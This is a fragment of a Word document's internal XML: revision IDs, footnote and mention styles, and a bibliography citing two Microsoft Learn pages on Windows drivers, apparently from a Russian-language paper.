    <w:rsid w:val="006F33F6"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="0070000B"/>
    <w:rsid w:val="0070024E"/>
    <w:rsid w:val="00704931"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="00725359"/>
    <w:rsid w:val="00727223"/>
    <w:rsid w:val="0073025A"/>
    <w:rsid w:val="007302BD"/>
    <w:rsid w:val="00730D59"/>
    <w:rsid w:val="00730F58"/>
    <w:rsid w:val="007318B2"/>
    <w:rsid w:val="00736B36"/>
    <w:rsid w:val="00741F8E"/>
    <w:rsid w:val="00742710"/>
    <w:rsid w:val="00747013"/>
    <w:rsid w:val="007503A5"/>
    <w:rsid w:val="007511B9"/>
    <w:rsid w:val="00751EAF"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="0075305E"/>
    <w:rsid w:val="007551B1"/>
    <w:rsid w:val="00756888"/>
    <w:rsid w:val="00757CCB"/>
    <w:rsid w:val="00757E47"/>
    <w:rsid w:val="00760350"/>
    <w:rsid w:val="0076565C"/>
    <w:rsid w:val="0077058A"/>
    <w:rsid w:val="00771192"/>
    <w:rsid w:val="00772F1D"/>
    <w:rsid w:val="00773594"/>
    <w:rsid w:val="00780292"/>
    <w:rsid w:val="00781CC6"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="00787408"/>
    <w:rsid w:val="00790FC5"/>
    <w:rsid w:val="007919E6"/>
    <w:rsid w:val="007949B5"/>
    <w:rsid w:val="00796F11"/>
    <w:rsid w:val="007A2CF6"/>
    <w:rsid w:val="007A6BFC"/>
    <w:rsid w:val="007B01B8"/>
    <w:rsid w:val="007B0A2A"/>
    <w:rsid w:val="007C0F22"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007C4212"/>
    <w:rsid w:val="007C4A57"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007E1586"/>
    <w:rsid w:val="007E35C7"/>
    <w:rsid w:val="007E6304"/>
    <w:rsid w:val="007E66A8"/>
    <w:rsid w:val="007E68D0"/>
    <w:rsid w:val="007F0362"/>
    <w:rsid w:val="007F304D"/>
    <w:rsid w:val="007F6E09"/>
    <w:rsid w:val="007F7F9D"/>
    <w:rsid w:val="0080045E"/>
    <w:rsid w:val="0080337A"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="00805715"/>
    <w:rsid w:val="00806F3C"/>
    <w:rsid w:val="008158B1"/>
    <w:rsid w:val="008167BD"/>
    <w:rsid w:val="00817712"/>
    <w:rsid w:val="00820246"/>
    <w:rsid w:val="00820E74"/>
    <w:rsid w:val="00823FAB"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="008318E7"/>
    <w:rsid w:val="0083560D"/>
    <w:rsid w:val="008367F1"/>
    <w:rsid w:val="0084157C"/>
    <w:rsid w:val="008430FC"/>
    <w:rsid w:val="00852FAA"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="008539A1"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="00862EC0"/>
    <w:rsid w:val="008657F0"/>
    <w:rsid w:val="00865985"/>
    <w:rsid w:val="00872308"/>
    <w:rsid w:val="008732EF"/>
    <w:rsid w:val="00873A78"/>
    <w:rsid w:val="00875799"/>
    <w:rsid w:val="00876189"/>
    <w:rsid w:val="0087660F"/>
    <w:rsid w:val="008840F1"/>
    <w:rsid w:val="00884F56"/>
    <w:rsid w:val="008858C4"/>
    <w:rsid w:val="0088615D"/>
    <w:rsid w:val="008905F1"/>
    <w:rsid w:val="0089096F"/>
    <w:rsid w:val="0089107B"/>
    <w:rsid w:val="00892A30"/>
    <w:rsid w:val="00893893"/>
    <w:rsid w:val="00897481"/>
    <w:rsid w:val="008A1DFF"/>
    <w:rsid w:val="008A522E"/>
    <w:rsid w:val="008A531E"/>
    <w:rsid w:val="008A7EC0"/>
    <w:rsid w:val="008B1C72"/>
    <w:rsid w:val="008B265C"/>
    <w:rsid w:val="008B306F"/>
    <w:rsid w:val="008B3472"/>
    <w:rsid w:val="008B3D12"/>
    <w:rsid w:val="008B3D83"/>
    <w:rsid w:val="008B40BB"/>
    <w:rsid w:val="008B643C"/>
    <w:rsid w:val="008C05F9"/>
    <w:rsid w:val="008C1887"/>
    <w:rsid w:val="008C35F0"/>
    <w:rsid w:val="008C5A0E"/>
    <w:rsid w:val="008C67CE"/>
    <w:rsid w:val="008D0DE1"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008D7D62"/>
    <w:rsid w:val="008E274D"/>
    <w:rsid w:val="008E62CC"/>
    <w:rsid w:val="008E76E2"/>
    <w:rsid w:val="008F75DB"/>
    <w:rsid w:val="0090226B"/>
    <w:rsid w:val="00916003"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="00923AD3"/>
    <w:rsid w:val="00923E95"/>
    <w:rsid w:val="00926829"/>
    <w:rsid w:val="00931E31"/>
    <w:rsid w:val="00932438"/>
    <w:rsid w:val="00934775"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="009406F3"/>
    <w:rsid w:val="00944014"/>
    <w:rsid w:val="009457AD"/>
    <w:rsid w:val="00945A16"/>
    <w:rsid w:val="00945E84"/>
    <w:rsid w:val="009460A1"/>
    <w:rsid w:val="009475F5"/>
    <w:rsid w:val="00947935"/>
    <w:rsid w:val="00954C0B"/>
    <w:rsid w:val="0095571C"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="009642C7"/>
    <w:rsid w:val="00964913"/>
    <w:rsid w:val="00966CB4"/>
    <w:rsid w:val="00967997"/>
    <w:rsid w:val="00971125"/>
    <w:rsid w:val="009721F7"/>
    <w:rsid w:val="00973487"/>
    <w:rsid w:val="00980DEC"/>
    <w:rsid w:val="009826FA"/>
    <w:rsid w:val="00982A11"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="00984188"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="00991ADD"/>
    <w:rsid w:val="009930AB"/>
    <w:rsid w:val="00993E15"/>
    <w:rsid w:val="00994577"/>
    <w:rsid w:val="00994769"/>
    <w:rsid w:val="00995F1B"/>
    <w:rsid w:val="009A16E9"/>
    <w:rsid w:val="009A29E7"/>
    <w:rsid w:val="009A7520"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009A7BEF"/>
    <w:rsid w:val="009B1597"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009B56F3"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009C1B55"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009D72E9"/>
    <w:rsid w:val="009E0772"/>
    <w:rsid w:val="009E173D"/>
    <w:rsid w:val="009E2D28"/>
    <w:rsid w:val="009E7E7F"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F2F33"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="00A031FD"/>
    <w:rsid w:val="00A053EF"/>
    <w:rsid w:val="00A105AA"/>
    <w:rsid w:val="00A122C2"/>
    <w:rsid w:val="00A145B4"/>
    <w:rsid w:val="00A14844"/>
    <w:rsid w:val="00A16F02"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A25C65"/>
    <w:rsid w:val="00A263B5"/>
    <w:rsid w:val="00A30AD5"/>
    <w:rsid w:val="00A46EE0"/>
    <w:rsid w:val="00A47004"/>
    <w:rsid w:val="00A50740"/>
    <w:rsid w:val="00A51034"/>
    <w:rsid w:val="00A521D9"/>
    <w:rsid w:val="00A623D9"/>
    <w:rsid w:val="00A62F9B"/>
    <w:rsid w:val="00A6356B"/>
    <w:rsid w:val="00A63FBA"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00A67ED4"/>
    <w:rsid w:val="00A70B0C"/>
    <w:rsid w:val="00A726A0"/>
    <w:rsid w:val="00A7402E"/>
    <w:rsid w:val="00A75B7E"/>
    <w:rsid w:val="00A81100"/>
    <w:rsid w:val="00A842D6"/>
    <w:rsid w:val="00A848E7"/>
    <w:rsid w:val="00A9412B"/>
    <w:rsid w:val="00A9799C"/>
    <w:rsid w:val="00AA41D5"/>
    <w:rsid w:val="00AA50CA"/>
    <w:rsid w:val="00AB3187"/>
    <w:rsid w:val="00AB4905"/>
    <w:rsid w:val="00AB4DBF"/>
    <w:rsid w:val="00AC4269"/>
    <w:rsid w:val="00AC4E16"/>
    <w:rsid w:val="00AC5BCE"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AD3A9B"/>
    <w:rsid w:val="00AD4308"/>
    <w:rsid w:val="00AE0FD0"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE1FDE"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE3BF4"/>
    <w:rsid w:val="00AE5218"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00AF3B78"/>
    <w:rsid w:val="00AF511A"/>
    <w:rsid w:val="00AF75F0"/>
    <w:rsid w:val="00B00D1E"/>
    <w:rsid w:val="00B03F3E"/>
    <w:rsid w:val="00B04134"/>
    <w:rsid w:val="00B058EE"/>
    <w:rsid w:val="00B07037"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B15032"/>
    <w:rsid w:val="00B16956"/>
    <w:rsid w:val="00B16BDA"/>
    <w:rsid w:val="00B1704A"/>
    <w:rsid w:val="00B2002B"/>
    <w:rsid w:val="00B23D20"/>
    <w:rsid w:val="00B313E1"/>
    <w:rsid w:val="00B3322C"/>
    <w:rsid w:val="00B426C7"/>
    <w:rsid w:val="00B45BC8"/>
    <w:rsid w:val="00B47475"/>
    <w:rsid w:val="00B52435"/>
    <w:rsid w:val="00B52920"/>
    <w:rsid w:val="00B55FB4"/>
    <w:rsid w:val="00B57CCC"/>
    <w:rsid w:val="00B626A9"/>
    <w:rsid w:val="00B70D74"/>
    <w:rsid w:val="00B75F91"/>
    <w:rsid w:val="00B76512"/>
    <w:rsid w:val="00B818A9"/>
    <w:rsid w:val="00B854B5"/>
    <w:rsid w:val="00B87154"/>
    <w:rsid w:val="00B878D9"/>
    <w:rsid w:val="00B91720"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00B96BD9"/>
    <w:rsid w:val="00BA3B26"/>
    <w:rsid w:val="00BA4DAC"/>
    <w:rsid w:val="00BB2C0D"/>
    <w:rsid w:val="00BB3637"/>
    <w:rsid w:val="00BB3F97"/>
    <w:rsid w:val="00BB4CD8"/>
    <w:rsid w:val="00BB7D03"/>
    <w:rsid w:val="00BC0BD8"/>
    <w:rsid w:val="00BC2756"/>
    <w:rsid w:val="00BC3ABA"/>
    <w:rsid w:val="00BD5244"/>
    <w:rsid w:val="00BD6CEF"/>
    <w:rsid w:val="00BE0C14"/>
    <w:rsid w:val="00BE0E54"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00BF1E51"/>
    <w:rsid w:val="00C05F43"/>
    <w:rsid w:val="00C118B2"/>
    <w:rsid w:val="00C16738"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C17761"/>
    <w:rsid w:val="00C2010B"/>
    <w:rsid w:val="00C20C64"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C232AF"/>
    <w:rsid w:val="00C31B73"/>
    <w:rsid w:val="00C34729"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C41D2E"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C54EF6"/>
    <w:rsid w:val="00C61237"/>
    <w:rsid w:val="00C65E22"/>
    <w:rsid w:val="00C66061"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C71DDD"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C805FA"/>
    <w:rsid w:val="00C819E0"/>
    <w:rsid w:val="00C82400"/>
    <w:rsid w:val="00C84051"/>
    <w:rsid w:val="00C85B0C"/>
    <w:rsid w:val="00C90EE9"/>
    <w:rsid w:val="00C92A68"/>
    <w:rsid w:val="00C93DCC"/>
    <w:rsid w:val="00CA1C71"/>
    <w:rsid w:val="00CA1C8D"/>
    <w:rsid w:val="00CA58F3"/>
    <w:rsid w:val="00CA5F53"/>
    <w:rsid w:val="00CA74A1"/>
    <w:rsid w:val="00CB266B"/>
    <w:rsid w:val="00CB4E59"/>
    <w:rsid w:val="00CB51F6"/>
    <w:rsid w:val="00CB5221"/>
    <w:rsid w:val="00CB581C"/>
    <w:rsid w:val="00CC13AD"/>
    <w:rsid w:val="00CC13BF"/>
    <w:rsid w:val="00CC429A"/>
    <w:rsid w:val="00CD0829"/>
    <w:rsid w:val="00CD2A99"/>
    <w:rsid w:val="00CD50BB"/>
    <w:rsid w:val="00CD56A4"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00CE02E8"/>
    <w:rsid w:val="00CE030E"/>
    <w:rsid w:val="00CE0944"/>
    <w:rsid w:val="00CE3016"/>
    <w:rsid w:val="00CE3E32"/>
    <w:rsid w:val="00CE42EB"/>
    <w:rsid w:val="00CE7804"/>
    <w:rsid w:val="00CF15BE"/>
    <w:rsid w:val="00CF1A49"/>
    <w:rsid w:val="00CF28D1"/>
    <w:rsid w:val="00CF701A"/>
    <w:rsid w:val="00CF7D71"/>
    <w:rsid w:val="00CF7EC6"/>
    <w:rsid w:val="00D024BC"/>
    <w:rsid w:val="00D03F9F"/>
    <w:rsid w:val="00D10411"/>
    <w:rsid w:val="00D10D48"/>
    <w:rsid w:val="00D13846"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D169B9"/>
    <w:rsid w:val="00D20C6C"/>
    <w:rsid w:val="00D20CA2"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D250C9"/>
    <w:rsid w:val="00D26EE5"/>
    <w:rsid w:val="00D279A4"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D33663"/>
    <w:rsid w:val="00D337F7"/>
    <w:rsid w:val="00D34AC5"/>
    <w:rsid w:val="00D5216F"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D52DBA"/>
    <w:rsid w:val="00D55FA4"/>
    <w:rsid w:val="00D57953"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D6203A"/>
    <w:rsid w:val="00D64688"/>
    <w:rsid w:val="00D735BC"/>
    <w:rsid w:val="00D740EB"/>
    <w:rsid w:val="00D744B7"/>
    <w:rsid w:val="00D9428C"/>
    <w:rsid w:val="00D95975"/>
    <w:rsid w:val="00D96D5C"/>
    <w:rsid w:val="00D9739F"/>
    <w:rsid w:val="00DA06E5"/>
    <w:rsid w:val="00DA31FF"/>
    <w:rsid w:val="00DA7F8D"/>
    <w:rsid w:val="00DB066B"/>
    <w:rsid w:val="00DB1461"/>
    <w:rsid w:val="00DB2854"/>
    <w:rsid w:val="00DB644F"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DB77E9"/>
    <w:rsid w:val="00DC42B8"/>
    <w:rsid w:val="00DD648F"/>
    <w:rsid w:val="00DD64B7"/>
    <w:rsid w:val="00DE0487"/>
    <w:rsid w:val="00DE3A0D"/>
    <w:rsid w:val="00DE42F0"/>
    <w:rsid w:val="00DE6475"/>
    <w:rsid w:val="00DF4689"/>
    <w:rsid w:val="00E0267F"/>
    <w:rsid w:val="00E07974"/>
    <w:rsid w:val="00E1099E"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E177D5"/>
    <w:rsid w:val="00E23322"/>
    <w:rsid w:val="00E24F20"/>
    <w:rsid w:val="00E26F26"/>
    <w:rsid w:val="00E273B2"/>
    <w:rsid w:val="00E27B72"/>
    <w:rsid w:val="00E322F5"/>
    <w:rsid w:val="00E32855"/>
    <w:rsid w:val="00E34644"/>
    <w:rsid w:val="00E357FD"/>
    <w:rsid w:val="00E41C36"/>
    <w:rsid w:val="00E43880"/>
    <w:rsid w:val="00E43B71"/>
    <w:rsid w:val="00E45448"/>
    <w:rsid w:val="00E5587A"/>
    <w:rsid w:val="00E5625D"/>
    <w:rsid w:val="00E571A7"/>
    <w:rsid w:val="00E604CF"/>
    <w:rsid w:val="00E61ADF"/>
    <w:rsid w:val="00E62666"/>
    <w:rsid w:val="00E67132"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E77E67"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00E82DFC"/>
    <w:rsid w:val="00E90331"/>
    <w:rsid w:val="00E90C0C"/>
    <w:rsid w:val="00E934D6"/>
    <w:rsid w:val="00E941B2"/>
    <w:rsid w:val="00E95B4E"/>
    <w:rsid w:val="00EA13A7"/>
    <w:rsid w:val="00EA54FB"/>
    <w:rsid w:val="00EB11B3"/>
    <w:rsid w:val="00EB15DE"/>
    <w:rsid w:val="00EB4A04"/>
    <w:rsid w:val="00EB78CC"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00ED0089"/>
    <w:rsid w:val="00ED703B"/>
    <w:rsid w:val="00EE3952"/>
    <w:rsid w:val="00EE6ECF"/>
    <w:rsid w:val="00EF46B6"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00EF6501"/>
    <w:rsid w:val="00EF7F40"/>
    <w:rsid w:val="00F03313"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F038DE"/>
    <w:rsid w:val="00F06FFC"/>
    <w:rsid w:val="00F07134"/>
    <w:rsid w:val="00F16637"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F2105E"/>
    <w:rsid w:val="00F24962"/>
    <w:rsid w:val="00F27392"/>
    <w:rsid w:val="00F31302"/>
    <w:rsid w:val="00F32C2F"/>
    <w:rsid w:val="00F3337B"/>
    <w:rsid w:val="00F340CF"/>
    <w:rsid w:val="00F36A01"/>
    <w:rsid w:val="00F37DF8"/>
    <w:rsid w:val="00F42EBB"/>
    <w:rsid w:val="00F469B7"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F5376F"/>
    <w:rsid w:val="00F56493"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F6117B"/>
    <w:rsid w:val="00F62D87"/>
    <w:rsid w:val="00F63D4E"/>
    <w:rsid w:val="00F664C2"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F713DD"/>
    <w:rsid w:val="00F71C47"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F73FAA"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F75F1B"/>
    <w:rsid w:val="00F763B4"/>
    <w:rsid w:val="00F777F2"/>
    <w:rsid w:val="00F77A05"/>
    <w:rsid w:val="00F8256C"/>
    <w:rsid w:val="00F91557"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00F91E9D"/>
    <w:rsid w:val="00F94340"/>
    <w:rsid w:val="00FA2DAE"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FA4791"/>
    <w:rsid w:val="00FA7C6E"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB3E29"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FB64E4"/>
    <w:rsid w:val="00FB7BE9"/>
    <w:rsid w:val="00FC44A0"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FE09B5"/>
    <w:rsid w:val="00FE148F"/>
    <w:rsid w:val="00FE1E96"/>
    <w:rsid w:val="00FE2979"/>
    <w:rsid w:val="00FE2ACF"/>
    <w:rsid w:val="00FE4BC3"/>
    <w:rsid w:val="00FE785B"/>
    <w:rsid w:val="00FE7FAB"/>
    <w:rsid w:val="00FF4294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F5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34"/>
    <w:locked/>
    <w:rsid w:val="00A105AA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="affa">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="affb"/>
    <w:uiPriority w:val="10"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00B87154"/>
    <w:pPr>
      <w:spacing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5"/>
    <w:link w:val="affa"/>
    <w:uiPriority w:val="10"/>
    <w:semiHidden/>
    <w:rsid w:val="00B87154"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affc">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00B87154"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affd">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DD64B7"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD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F0713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F0713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Mic24</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{9A7401C8-CF0D-4AFA-B6A4-FBDE6F78FF93}</b:Guid>
    <b:Title>What is a driver?</b:Title>
    <b:Year>2024</b:Year>
    <b:Author>
      <b:Author>
        <b:Corporate>Microsoft Learn</b:Corporate>
      </b:Author>
    </b:Author>
    <b:InternetSiteTitle>Microsoft Learn</b:InternetSiteTitle>
    <b:Month>Сентябрь</b:Month>
    <b:Day>27</b:Day>
    <b:YearAccessed>2025</b:YearAccessed>
    <b:MonthAccessed>Июль</b:MonthAccessed>
    <b:DayAccessed>3</b:DayAccessed>
    <b:URL>https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/what-is-a-driver-</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic25</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{77B97392-4D00-4107-9B65-2F2A11D73AB2}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Microsoft Learn</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Types of WDM drivers</b:Title>
    <b:InternetSiteTitle>Microsoft Learn</b:InternetSiteTitle>
    <b:Year>2025</b:Year>
    <b:Month>Февраль</b:Month>
    <b:Day>21</b:Day>
    <b:YearAccessed>2025</b:YearAccessed>
    <b:MonthAccessed>Июль</b:MonthAccessed>
    <b:DayAccessed>3</b:DayAccessed>
    <b:URL>https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/types-of-wdm-drivers</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0C6C2D6E-8D4E-46AE-834B-97745841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7873</Words>
  <Characters>4487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10-29T08:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-29T08:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>